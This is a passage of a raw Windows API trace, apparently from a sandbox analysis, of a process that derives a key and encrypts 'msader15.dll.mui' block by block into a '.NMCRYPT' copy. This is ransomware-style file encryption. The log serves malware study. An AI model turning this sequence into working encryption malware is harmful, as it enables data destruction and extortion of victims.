1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.230] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.231] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.232] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0168.233] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0168.233] CryptCreateHash (in: hProv=0x8e3bb0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448e4 | out: phHash=0x1d4448e4) returned 1 [0168.233] CryptHashData (hHash=0x9ad838, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.233] CryptDeriveKey (in: hProv=0x8e3bb0, Algid=0x6610, hBaseData=0x9ad838, dwFlags=0x4, phKey=0x1d4448e8 | out: phKey=0x1d4448e8*=0x9ad7f8) returned 1 [0168.233] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0168.233] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0168.233] wcslen (_String="\\\\?\\") returned 0x4 [0168.233] CryptDuplicateKey (in: hKey=0x9ad7f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad1f8) returned 1 [0168.233] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0168.235] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0168.235] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=18432) returned 1 [0168.235] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0168.235] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.236] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.236] GetLastError () returned 0x0 [0168.236] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.255] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.255] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.256] GetLastError () returned 0x0 [0168.256] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.256] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.256] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.256] GetLastError () returned 0x0 [0168.256] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.256] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.256] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.256] GetLastError () returned 0x0 [0168.256] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.256] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.256] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.256] GetLastError () returned 0x0 [0168.256] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.256] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.256] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.256] GetLastError () returned 0x0 [0168.256] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.256] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.256] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.256] GetLastError () returned 0x0 [0168.256] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.256] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.257] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.257] GetLastError () returned 0x0 [0168.257] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.257] ReadFile (in: hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, 